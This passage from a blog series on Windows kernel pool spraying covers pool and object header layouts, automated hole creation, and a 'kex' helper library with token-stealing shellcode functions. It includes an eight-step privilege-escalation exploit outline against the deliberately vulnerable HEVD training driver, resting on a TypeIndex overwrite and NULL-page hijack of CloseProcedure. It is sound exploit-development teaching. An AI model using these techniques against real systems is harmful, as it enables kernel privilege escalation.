 fffff02702305420 size:  370 previous size:   e0  (Allocated)  Gla5
 fffff02702305790 size:   e0 previous size:  370  (Allocated)  Gla8
 fffff02702305870 size:   b0 previous size:   e0  (Allocated)  Uscu Process: ffffbc07f150c800
 fffff02702305920 size:  370 previous size:   b0  (Allocated)  Gla5
*fffff02702305c90 size:  370 previous size:  370  (Allocated) *Gla5
  Pooltag Gla5 : GDITAG_HMGR_LOOKASIDE_SURF_TYPE, Binary : win32k.sys

So that remained 0x370.

What about large pools?

create_bitmap(0xda0, 1, 8)

kd> !pool fffff02704f5a000
Pool page fffff02704f5a000 region is Paged session pool
fffff02704f5a000 is not a valid large pool allocation, checking large session pool...
*fffff02704f5a000 : large page allocation, tag is Gh05, size is 0x1000 bytes
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys
kd> dc fffff02704f5a000
fffff027`04f5a000  17050c9c 00000000 00000000 00000000  ................
fffff027`04f5a010  00000000 00000000 00000000 00000000  ................
fffff027`04f5a020  17050c9c 00000000 00000000 00000000  ................
fffff027`04f5a030  00000000 00000000 00000da0 00000001  ................
fffff027`04f5a040  00000da0 00000000 04f5a260 fffff027  ........`...'...
fffff027`04f5a050  04f5a260 fffff027 00000da0 0000b2b7  `...'...........
fffff027`04f5a060  00000003 00010000 00000000 00000000  ................
fffff027`04f5a070  04800200 00000000 00000000 00000000  ................

Looks to follow the same pattern, again, the only change is the BITMAP_DATA offset. So the logic for Win10x64 v1607:

def allocate_bitmap_with_given_size(s):
 if s < 0x370:
  print "[-] Too small size, such Bitmap can’t be allocated…"
 elif s < 0x1000:
  print "[+] Allocating Bitmap in the Paged paged pool"
  width = s - 0x260 - 0x10
  create_bitmap (width, 1, 8)
  print "[+] Allocating Bitmap in the Paged session pool / large pool"
  width = s - 0x260
  create_bitmap (width, 1, 8)


Win7x64 to Win10v1607:
See the details in:


Friday, September 15, 2017

Windows kernel pool spraying fun - Part 4 - object & pool headers, kex & putting it all together

2 weeks... LOL... I had to finish this up. :)

This post will be looooong, where we check the actual objects and their headers, and finally put together the actual exploit for HEVD, and I release my first version of kex.

Before we move forward for the actual exploitation we will need to prepare some more data for our objects. When we actually do a pool overflow, we will write outside of the hole (this is why we need to precisely control the new allocation with the hole) and overwriting the next object. Since we reserved the objects we will know what we overwrite but we need to see, what to place there, as messing up with kernel structures is a fast way towards BSODs.

I made a spray, and this is what I have:

Object location: 87999400
Pool page 87999400 region is Nonpaged pool
 87999000 size:   50 previous size:    0  (Allocated)  Muta (Protected)
 87999050 size:   10 previous size:   50  (Free)       P...
 87999060 size:   50 previous size:   10  (Free )  Muta (Protected)
 879990b0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999100 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999150 size:   50 previous size:   50  (Free )  Muta (Protected)
 879991a0 size:   50 previous size:   50  (Free )  Muta (Protected)
 879991f0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999240 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999290 size:   50 previous size:   50  (Free )  Muta (Protected)
 879992e0 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999330 size:   50 previous size:   50  (Free )  Muta (Protected)
 87999380 size:   50 previous size:   50  (Free )  Muta (Protected)
*879993d0 size:   50 previous size:   50  (Allocated) *Muta (Protected)
Pooltag Muta : Mutant objects
 87999420 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999470 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 879994c0 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999510 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999560 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 879995b0 size:   50 previous size:   50  (Allocated)  Muta (Protected)
 87999600 size:   50 previous size:   50  (Allocated)  Muta (Protected)

We can see that the object is at 0x87999400 while the actual reservation starts at 0x879993d0, so the object is +0x30 bytes offset from the beginning of the pool. That's because we have the POOL_HEADER, potential OPTIONAL_HEADERS and the OBJECT_HEADER there (see:, and we can see that it will be always the same for our allocation (showing the pool headers here) except the PreviousSize which can vary, but we can predict that:

||1:lkd> dt nt!_POOL_HEADER 879993d0 
   +0x000 PreviousSize     : 0y000001010 (0xa)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001010 (0xa)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x40a000a
   +0x004 PoolTag          : 0xe174754d
   +0x004 AllocatorBackTraceIndex : 0x754d
   +0x006 PoolTagHash      : 0xe174
||1:lkd> dt nt!_POOL_HEADER 879993d0+50
   +0x000 PreviousSize     : 0y000001010 (0xa)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001010 (0xa)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x40a000a
   +0x004 PoolTag          : 0xe174754d
   +0x004 AllocatorBackTraceIndex : 0x754d
   +0x006 PoolTagHash      : 0xe174

The OBJECT_HEADER will be at 0x18 offset

||1:lkd> !object 87999400
Object: 87999400  Type: (8521a838) Mutant
    ObjectHeader: 879993e8 (new version)
    HandleCount: 1  PointerCount: 1

||1:lkd> dt nt!_OBJECT_HEADER 879993e8 
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xe ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x86e0bd80 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x86e0bd80 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

and the others will be the same:

||1:lkd> !object 87999400+50
Object: 87999450  Type: (8521a838) Mutant
    ObjectHeader: 87999438 (new version)
    HandleCount: 1  PointerCount: 1
||1:lkd> dt nt!_OBJECT_HEADER 879993e8 +50
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xe ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x86e0bd80 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x86e0bd80 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

They could be different if we would have more handles open, but since we do the spraying, no one else will care about these objects. The object body starts at offset 0x18, this is how we get to our object at offset 0x30.

We can also see this if we dump the entire 0x50 bytes:

||1:lkd> dd 879993d0 L50/4
879993d0  040a0070 e174754d 00000000 00000050
879993e0  00000000 00000000 00000001 00000001
879993f0  00000000 0008000e 86e0bd80 00000000
87999400  00080002 00000001 87999408 87999408
87999410  00000000 00000000 00000000 00000000

||1:lkd> dd 879993d0+50 L50/4
87999420  040a000a e174754d 00000000 00000050
87999430  00000000 00000000 00000001 00000001
87999440  00000000 0008000e 86e0bd80 00000000
87999450  00080002 00000001 87999458 87999458
87999460  00000000 00000000 00000000 00000000

The underlined part is the PreviousSize, which is changing. So if we overflow into this object and use the same 0x28 bytes, we will be safe. We overwrote the object, with the same data. That's nice, but why it will be good for us? Well, we will modify the data, especially the typeindex, which is 0xe in the case above. The TypeIndex is an index to the object type table, which tells us what is this object:

||1:lkd> dd nt!ObTypeIndexTable+4*0xe L1
82b805b8  8521a838
||1:lkd> dt nt!_OBJECT_TYPE 8521a838
   +0x000 TypeList         : _LIST_ENTRY [ 0x8521a838 - 0x8521a838 ]
   +0x008 Name             : _UNICODE_STRING "Mutant"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xe ''
   +0x018 TotalNumberOfObjects : 0x187ff
   +0x01c TotalNumberOfHandles : 0x1880f
   +0x020 HighWaterNumberOfObjects : 0x7a26a
   +0x024 HighWaterNumberOfHandles : 0x7a28e
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x078 TypeLock         : _EX_PUSH_LOCK
   +0x07c Key              : 0x6174754d
   +0x080 CallbackList     : _LIST_ENTRY [ 0x8521a8b8 - 0x8521a8b8 ]

It has an embedded structure the OBJECT_TYPE_INITIALIZER which gives us a list of pointers to functions to be called at certain points of the object's lifecycle.

||1:lkd> dt nt!_OBJECT_TYPE_INITIALIZER 8521a838+0x28
   +0x000 Length           : 0x50
   +0x002 ObjectTypeFlags  : 0 ''
   +0x002 CaseInsensitive  : 0y0
   +0x002 UnnamedObjectsOnly : 0y0
   +0x002 UseDefaultObject : 0y0
   +0x002 SecurityRequired : 0y0
   +0x002 MaintainHandleCount : 0y0
   +0x002 MaintainTypeList : 0y0
   +0x002 SupportsObjectCallbacks : 0y0
   +0x002 CacheAligned     : 0y0
   +0x004 ObjectTypeCode   : 2
   +0x008 InvalidAttributes : 0x100
   +0x00c GenericMapping   : _GENERIC_MAPPING
   +0x01c ValidAccessMask  : 0x1f0001
   +0x020 RetainAccess     : 0
   +0x024 PoolType         : 0 ( NonPagedPool )
   +0x028 DefaultPagedPoolCharge : 0
   +0x02c DefaultNonPagedPoolCharge : 0x50
   +0x030 DumpProcedure    : (null) 
   +0x034 OpenProcedure    : (null) 
   +0x038 CloseProcedure   : (null) 
   +0x03c DeleteProcedure  : 0x82afe453     void  nt!ExpDeleteMutant+0
   +0x040 ParseProcedure   : (null) 
   +0x044 SecurityProcedure : 0x82ca2936     long  nt!SeDefaultObjectMethod+0
   +0x048 QueryNameProcedure : (null) 
   +0x04c OkayToCloseProcedure : (null) 

Now, if we zero out the TypeIndex, this is where we get:

||1:lkd> dd nt!ObTypeIndexTable+4*0x0 L1
82b80580  00000000

Based on this, once the index is ZERO, the kernel will look for the OBJECT_TYPE and then the OBJECT_TYPE_INITALIZER structure at the NULL page, which we can map on Win 7 x86 (not in later versions).

Now we just need to have a collection of the first 0x28 bytes from the beginning of the pool allocation for the various objects.

During the collection I found that in case of named objects the above is slightly different. For example:

Named Semaphore:
9a06fb38 //pointer to ???? I couldn't figure out what is there. Anyone? It's changing between reloads.
00260026 //length of the name * 2 as it's stored in Unicode
adecd178 //pointer to the name (UNICODE)

So it's not that easy to use a named one as we have a varying pointer which I don't know where it points to + I'm not sure what would happen if I put a pointer to user space for the name. We can't predict the pointer in kernel space. Another one which doesn't really work is IoCompletionPort. So I removed all of these from my list. Anyhow, even without these we have a good set of objects, and some further research is needed on the others. This is what we have with the PreviousSize 0-d out:

pool_object_headers['unnamed_mutex'] = [0x040a0000,0xe174754d,0x00000000,0x00000050,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000e]
pool_object_headers['unnamed_job'] = [0x042d0000,0xa0626f4a,0x00000000,0x00000168,0x0000006c,0x86e0bd80,0x00000001,0x00000001,0x00000000,0x00080006]
pool_object_headers['iocompletionreserve'] = [0x040c0000,0xef436f49,0x00000000,0x0000005c,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000a]
pool_object_headers['unnamed_semaphore'] = [0x04090000,0xe16d6553,0x00000000,0x00000044,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x00080010]
pool_object_headers['event'] = [0x04080000,0xee657645,0x00000000,0x00000040,0x00000000,0x00000000,0x00000001,0x00000001,0x00000000,0x0008000c]

A quick note on the PreviousSize field. We always know what it should be. We know exactly the hole we create and this value is simple that size divided by 8, so we can always dynamically generate it. It's added to the code.

Now let's go to exploitation.

What is kex? Well it stands for kernel exploitation, and also if you pronounce it, in Hungarian it means 'cookie' (although that word is written as keksz ('ksz' is pronounced as 'x')), and it's a collection of functions that can help writing kernel exploits faster. At this moment it has the following functions:

def allocate_object(object_to_use, variance):
def find_object_to_spray(required_hole_size):
def spray(required_hole_size):
def make_hole(required_hole_size, good_object):
def gimme_the_hole(required_hole_size):
def close_all_handles():
def calculate_previous_size(required_hole_size):
def pool_overwrite(required_hole_size,good_object):
def ctl_code(function,
def getLastError():
def alloc_memory(base_address, input, input_size):
def find_driver_base(driver=None):
def get_haldispatchtable():
def get_haldisp_ofsetsx86():
def get_haldisp_ofsetsx64():
def setosvariablesx86():
def setosvariablesx64():
def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation):
def restoretokenx86(RETVAL, extra = ""):
def tokenstealingx86(RETVAL, extra = ""):
def tokenstealingx64(RETVAL, extra = ""):
def tokenstealing(RETVAL, extra = ""):

Basically functions to help with finding various offsets based on OS version, finding the HalDispatchTable location, generating tokenstealing shellcode for various platforms and cases, functions to allocate memory and a set of functions that I created as part of my kernel pool spraying fun series :) like spraying, creating holes just based on the pool size we know, we don't need to prepare anything or worry about the objects. It was long time ago in my plans but somehow went under the table. I do plan to catch up with this 'project' and start to add other stuff, like bitmap read/write stuff, which is needed for newer OSs.

Not all functions were developed by myself, there are particles that were taken from various sources, and I tried to indicate it. I might modify it to my needs, like adding parameters but I still wanted to indicate the source, and not take credits for it.

So what's the difference. If I take my original HackSysExtremeVulnerableDriver pool overflow exploit, found here, it's 200 lines:

With the kex helpers, it's about 50, which is much nicer, and you don't need to worry about many things.

Our required hole size is 0x200 (HEVD allocates 0x1f8 size, but it takes 0x200 on the pool: buffer + 8 byte POOL_HEADER).

A summary of this HEVD exploit:
  1. open the driver
  2. allocate our input at 0x41410000, which consists of 0x1f8 random data, and the additional overflow part
  3. put the value 0x42424242 at 0x00000060 (pointer to the "CloseProcedure" function handler)
  4. generate a tokenstealing shellcode and allocate it it into 0x42424242
  5. spray the kernel pool, and make holes (multiple)
  6. call the driver vulnerable function to make the overflow
  7. close all handles to trigger our shellcode
  8. open cmd.exe

The exploit works very reliably, I run it quite a few times.

You can find kex here:

If you find any bug, please report it, I tried to filter out everything and test most of the functions, but you never know.

Thursday, September 14, 2017

Windows kernel pool spraying fun - Part 3 - Let's make holes

Maybe I should have started this whole series with some explanation. I want to make some scripts that can help with making Windows kernel exploit development faster, and my first run is with pool spraying. Also, if you never read about kernel pool overflows, and exploiting them with pool spraying, maybe read this:

Now that we have a decent list of kernel object sizes (and the script can be run on other platforms, although probably I need to make some changes for x64 architecture) we can 'automate' the spraying and hole creation process, if we know what is the hole size we require.

  1. Once we analyzed the vulnerability we will know what is the object / buffer size the driver will allocate in the pool
  2. We need to control the placement of that allocation, so we need to prepare a given size hole in the pool, so that the kernel will allocate the new object there
  3. If we know the size, we can simply calculate what kind of objects are good for our spraying and how many of them will need to be free up
  4. If we know all of that we can spray the kernel, and make a hole
We will need info about the object and pool headers what we overwrite with the overflow, but I will deal with that later, as it's not required for the hole creation. I might be wrong, but with some preparation I hope that the overwriting data can be automatically generated as well. For now, I just want to make holes with a given size. So I made a script for this, which is available here (please keep in mind that it's hardcoded for Win7 SP1 x86):

It will ask for the hole size you want, and do the spraying, freeing up the space and showing that area in WinDBG. Also note that it still uses the local kernel debugger, where we can't set breakpoint, so there is some race condition, when we issue the !pool command, as some other kernel process can allocate in the free space. The reason I still on local kernel debugging is that it's much simpler now for the demonstration. When I get to actual exploit demo, I will need to have remote debugging, but I can use the functions I demo here. So here is the output:

lkd> !py c:\users\csaby\desktop\
Give me the size of the hole in hex: 440
Process: 8572bd40
Object location: 857e15f0
Pool page 857e15f0 region is Nonpaged pool
 857e1000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 857e1040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1080 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e10c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1180 size:   40 previous size:   40  (Free )  Even (Protected)
 857e11c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1200 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1240 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1280 size:   40 previous size:   40  (Free )  Even (Protected)
 857e12c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1300 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1340 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1380 size:   40 previous size:   40  (Free )  Even (Protected)
 857e13c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1400 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1440 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1480 size:   40 previous size:   40  (Free )  Even (Protected)
 857e14c0 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1500 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1540 size:   40 previous size:   40  (Free )  Even (Protected)
 857e1580 size:   40 previous size:   40  (Free )  Even (Protected)
*857e15c0 size:   40 previous size:   40  (Allocated) *Even (Protected)
Pooltag Even : Event objects
 857e1600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e16c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 857e1740 size:   40 previous size:   40  (Allocated)  Even (Protected)

You can see that we have 17 x 0x40 space free, which is exactly 0x440, and that I didn't have to deal with the details. I can give any other size, e.g:

lkd> !py c:\users\csaby\desktop\
Give me the size of the hole in hex: 260
Process: 8572bd40
Object location: 87b2fe00
Pool page 87b2fe00 region is Nonpaged pool
 87b2f000 size:   98 previous size:    0  (Allocated)  IoCo (Protected)
 87b2f098 size:   90 previous size:   98  (Free)       ....
 87b2f128 size:   98 previous size:   90  (Allocated)  IoCo (Protected)
 87b2f1c0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f258 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f2f0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f388 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f420 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f4b8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f550 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f5e8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f680 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f718 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f7b0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f848 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f8e0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2f978 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fa10 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2faa8 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fb40 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fbd8 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fc70 size:   98 previous size:   98  (Free )  IoCo (Protected)
 87b2fd08 size:   98 previous size:   98  (Free )  IoCo (Protected)
*87b2fda0 size:   98 previous size:   98  (Allocated) *IoCo (Protected)
Owning component : Unknown (update pooltag.txt)
 87b2fe38 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2fed0 size:   98 previous size:   98  (Allocated)  IoCo (Protected)
 87b2ff68 size:   98 previous size:   98  (Allocated)  IoCo (Protected)

As we see the spraying adapts to our needs. Note that different objects were used this time. If you test it many times, try to use a number which will result in different object allocation, so you get a cleaner output.

Another important thing to note is that the hole creation is not 100% reliable here, but I believe it's very close. What I do is the following: I spray the kernel with 100000 objects, and free up X in the middle. Very likely that those will be reserved next to each other, and give us the space we need when I free them, and for demonstrating the 'automation' this was the easiest. It could be more reliable if:
  1. I try to make multiple holes, with freeing up multiple X handlers, possibly next to each other
  2. There is a way to leak the address of the objects from the kernel and calculate if they are next to each other, and thus freeing up the space that way. This will be the most reliable method.
As I progress, I will implement these but for now the first method makes it.

And yes, I code in Python, and not Powershell, simply because I can't code in PS, but I fully agree with everyone who says that making this in PS would make much more sense.

Part 4 will come later as I will be busy in the next 2 weeks, possibly no time for this, but will catch up after.